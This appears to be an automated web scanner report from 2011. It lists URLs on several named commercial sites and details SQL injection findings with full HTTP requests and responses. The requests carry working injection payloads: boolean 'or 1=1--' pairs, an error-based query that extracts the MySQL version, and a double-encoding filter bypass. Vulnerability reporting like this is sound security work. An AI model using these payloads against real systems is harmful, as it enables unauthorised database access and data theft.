35.23. https://hourly.deploy.com/images/logo.jpg

35.24. http://img.webalta.ru/public/css/style.css

35.25. http://img.webalta.ru/public/js/webalta.js

35.26. http://js.dt00.net/public/smi/elastic/24.js

35.27. http://kino.webalta.ru/banners.xml

35.28. http://kino.webalta.ru/sc/l/loach.js

35.29. http://l-files.livejournal.net/userapps/10/image

35.30. http://l-files.livejournal.net/userapps/2/image

35.31. http://l-files.livejournal.net/userapps/3/image

35.32. http://l-files.livejournal.net/userapps/4/image

35.33. http://l-files.livejournal.net/userapps/9/image

35.34. http://l-files.livejournal.net/vgift/445/small

35.35. http://learn.shavlik.com/shavlik/userCheck.cfm

35.36. http://limg.imgsmail.ru/mail/ru/css/search_top.css

35.37. http://mbox9e.offermatica.com/m2/eset/mbox/standard

35.38. http://my.webalta.ru/feed/l.php

35.39. http://my.webalta.ru/public/engine/app.js

35.40. http://my.webalta.ru/public/engine/catalog/general.txt

35.41. http://my.webalta.ru/public/engine/fw/fw_cookies.js

35.42. http://my.webalta.ru/public/engine/move.js

35.43. http://my.webalta.ru/public/engine/page.js

35.44. http://my.webalta.ru/public/engine/reader.js

35.45. http://my.webalta.ru/public/engine/settings.js

35.46. http://my.webalta.ru/public/engine/skinpacks.js

35.47. http://my.webalta.ru/public/engine/templates.js

35.48. http://my.webalta.ru/public/engine/widget/browse/widget_script.js

35.49. http://my.webalta.ru/public/engine/widget/flash/widget_script.js

35.50. http://my.webalta.ru/public/engine/widget/gameboss/widget_script.js

35.51. http://my.webalta.ru/public/engine/widget/labpixies/widget_script.js

35.52. http://my.webalta.ru/public/visual/index.css

35.53. http://my.webalta.ru/public/visual/theme.css

35.54. http://my.webalta.ru/public/visual/themes/css.php

35.55. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

35.56. http://now.eloqua.com/visitor/v200/svrGP.aspx

35.57. http://pogoda.webalta.ru/favicon.ico

35.58. http://pogoda.webalta.ru/public/css/style-weather.css

35.59. http://pogoda.webalta.ru/public/js/search.js

35.60. http://secure.comodo.com/products/guessregion

35.61. http://server.iad.liveperson.net/hcp/html/mTag.js

35.62. http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg

35.63. https://support.trust-guard.com/Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php

35.64. https://support.trust-guard.com/Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php

35.65. https://support.trust-guard.com/index.php

35.66. https://support.trust-guard.com/themes/client_default/Netsparker13749997f7e349eeb0039a51b507d58d.php

35.67. https://support.trust-guard.com/themes/client_default/index.php

35.68. https://support.trust-guard.com/themes/client_default/staffonline.gif

35.69. https://support.trust-guard.com/visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php

35.70. https://support.trust-guard.com/visitor/index.php

35.71. http://tengrinews.kz/static/js/remainNY.js

35.72. http://track.pulse360.com/cgi-bin/tracker.cgi

35.73. http://translate.googleapis.com/translate_a/t

35.74. http://vkontakte.ru/js/lang0_0.js

35.75. http://www.eset.com/us/scripts/business.js

35.76. http://www.eset.com/us/scripts/common.js

35.77. http://www.eset.com/us/scripts/elqNow/elqCfg.js

35.78. http://www.eset.com/us/scripts/elqNow/elqImg.js

35.79. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js

35.80. http://www.eset.com/us/scripts/lib/jq-promo-lib.js

35.81. http://www.eset.com/us/scripts/lib/jq.js

35.82. http://www.eset.com/us/scripts/lib/mbox.js

35.83. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js

35.84. http://www.eset.com/us/scripts/lib/s_code3.js

35.85. http://www.eset.com/us/scripts/store.js

35.86. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

35.87. http://www.gartner.com/include/webtrends.jsp

35.88. http://www.gartner.com/technology/include/metricsHelper.jsp

35.89. http://www.google.com/search

35.90. http://www.integritydefender.com/dateTimePicker/anytimejz.js

35.91. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/favicon.ico

35.92. http://www.iveco-ptc.spb.ru/images/menu/4d95d099884d7.gif

35.93. http://www.kayako.com/favicon.ico

35.94. http://www.kayako.com/images/hs-graphics/zoomin.cur

35.95. http://www.kayako.com/images/hs-graphics/zoomout.cur

35.96. http://www.livejournal.com/favicon.ico

35.97. http://www.livejournal.com/tools/endpoints/journalspotlight.bml

35.98. http://www.manageengine.com/images/bandwidth-monitoring.gif

35.99. http://www.manageengine.com/images/ip-sla-voip-monitoring.gif

35.100. http://www.manageengine.com/images/network-configuration-management.gif

35.101. http://www.manageengine.com/images/network-health-monitoring.gif

35.102. http://www.manageengine.com/images/network-mapping.gif

35.103. http://www.manageengine.com/images/traffic-analysis.gif

35.104. http://www.manageengine.com/images/wan-monitoring.gif

35.105. http://www.netsuite.com/portal/javascript/effects.js

35.106. http://www.netsuite.com/portal/javascript/prototype.js

35.107. http://www.reputationchanger.com/images/rc.ico

35.108. http://www.smpone.com/javascript/common.php

35.109. http://www.smpone.com/javascript/image_pop.php

35.110. http://www.smpone.com/javascript/showimages.php

35.111. http://www.tresware.com/javascript/bbcode.php

35.112. http://www.tresware.com/javascript/common.php

35.113. http://www.tresware.com/javascript/edittags.php

35.114. http://www.tresware.com/javascript/image_pop.php

35.115. http://www.tresware.com/javascript/showimages.php

35.116. http://www.trucklist.ru/webroot/delivery/js/scripts.js

35.117. http://www.trust-guard.com/Templates/New-Green/Images/favicon.ico

35.118. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_01.jpg

35.119. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_05.jpg

35.120. https://www.trust-guard.com/Images/BuyPage/scan-buttons/ScanBtns-gray_07.jpg

35.121. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico

36. Content type is not specified

36.1. https://checkout.netsuite.com/server-info

36.2. https://checkout.netsuite.com/server-status

36.3. https://hourly.deploy.com/hmc/report/index.cfm

36.4. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard

36.5. http://partner-support.wiki.zoho.com/favicon.ico

36.6. https://secure.trust-guard.com/ResetPassword.php

36.7. https://support.trust-guard.com/index.php

36.8. https://support.trust-guard.com/visitor/index.php

37. SSL certificate

37.1. https://checkout.netsuite.com/

37.2. https://forms.netsuite.com/

37.3. https://secure.trust-guard.com/

37.4. https://store.manageengine.com/

37.5. https://support.comodo.com/

37.6. https://support.trust-guard.com/

37.7. https://system.netsuite.com/

37.8. https://www.manageengine.com/

37.9. https://www.salesforce.com/

37.10. https://www.trust-guard.com/


1. SQL injection  next
There are 35 instances of this issue:

1.1. http://customer.kronos.com/user/managefavorites.asp [Referer HTTP header]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://customer.kronos.com
Path:   /user/managefavorites.asp

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /user/managefavorites.asp?favurl=http://customer.kronos.com/SiteFeedbackForm.htm&t=Site HTTP/1.1
Host: customer.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1303741346229; s_lv=1303741346233; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 25 Apr 2011 15:34:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 5466
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=OOBNPBCAIBACFMIKJIFGNJJN; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
<font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Procedure 'getFavorites' expects parameter '@UserID', which was not supplied.</font>
...[SNIP]...
1.2. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The h parameter appears to be vulnerable to SQL injection attacks. The payloads 52506121%20or%201%3d1--%20 and 52506121%20or%201%3d2--%20 were each submitted in the h parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /shavlik/index.cfm?m=521&pg=372&h=052506121%20or%201%3d1--%20&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 1334 372 -->
       
       
       
           
       
       
       
   
       
   














   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
   


   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   

   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik Free Antivirus Software Download</title>


<link rel="stylesheet" href="style/style2.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new Ac
...[SNIP]...

Request 2

GET /shavlik/index.cfm?m=521&pg=372&h=052506121%20or%201%3d2--%20&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 0 372 -->
       
       
       
   
       
   














   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
   


   
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   
           
   

   

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Shavlik Free Antivirus Software Download</title>


<link rel="stylesheet" href="style/style2.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
   <script language="javascript" type="text/javascript">
       function windowOpen(sURL, bFade, sWindowName) {
   
           if (bFade) {
               document.getElementById("body").style.backgroundColor = "gray";
           }
           
           sWindowName = sWindowName || "newWindow";
           
           nPosX = (window.screen.width/2) - (400);
           nPosY = (window.screen.height/2) - (350 + 75);
           
           newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);
           
           newWindow.focus();
               
           }
               
   
   var req;

function docLoad(url) {
   req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
   try {
           req = new XMLHttpRequest();
} catch(e) {
           req = false;
}
// IE
} else if(window.ActiveXObject) {
   try {
   req = new ActiveXObject("Msxml2.XMLHTTP");
   } catch(e) {
   try {
       req = new ActiveXObject("Microso
...[SNIP]...
1.3. http://learn.shavlik.com/shavlik/index.cfm [m parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The m parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the m parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))'&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: learn.shavlik.com
Cookie: CFID=799689; CFTOKEN=67476078
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 25 Apr 2011 12:26:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8


                                                                                           
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND DMMESSAGE.userCompanyID = 21
               ORDER BY
               DMMESSAGE.ID' at line 7
</font>
...[SNIP]...
1.4. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The txtEmail parameter appears to be vulnerable to SQL injection attacks. The payloads 19563258'%20or%201%3d1--%20 and 19563258'%20or%201%3d2--%20 were each submitted in the txtEmail parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 43

txtEmail=19563258'%20or%201%3d1--%20&btnSubmit=Submit&btnCancel=Cancel

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Trust Guard Login</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form id="content:content" method="post" style="margin:0px" action="index.php">
<br /><br />
<script type="text/javascript">

function validateForm()
{
var message;
var nouser = (!validatePresent(document.getElementById('txtEmail'),'msg_user'));
var nopass = (!validatePresent(document.getElementById('txtPassword'),'msg_pass'));
if (nouser && nopass)
message = 'Please enter a username and a password.';
else if (nouser)
message = 'Please enter a username.';
else if (nopass)
message = 'Please enter a password.';

...[SNIP]...

Request 2

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 43

txtEmail=19563258'%20or%201%3d2--%20&btnSubmit=Submit&btnCancel=Cancel

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3795
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<title>Reset Password</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form method="post" style="margin:0px">

Enter you email address or site name below and click Submit and we will send you a new password<br />
<input id="txtEmail" name="txtEmail" type="text" value="19563258' or 1=2-- " style="width:300px" onblur="validatePresent(this,'msg_email');" /><br />
<div id="msg_email">&nbsp;</div>
<span style="color:Red">
<span id='lblResult' >Could not find an account will the site 19563258' or 1=2-- .</span> </span>
<br />
<input id='btnSubmit' name='btnSubmit' type="submit" value="Submit"
onclick="return validatePresent(document.getElementById('php:txtEm
...[SNIP]...
1.5. http://shopping.netsuite.com/app/site/query/additemtocart.nl [NLPromocode cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The NLPromocode cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NLPromocode cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_%2527; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:12 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1229872416:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49047


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_%2527%2527; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:17 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -803915303:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54942


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>


<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
1.6. http://shopping.netsuite.com/app/site/query/additemtocart.nl [NLVisitorId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The NLVisitorId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NLVisitorId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
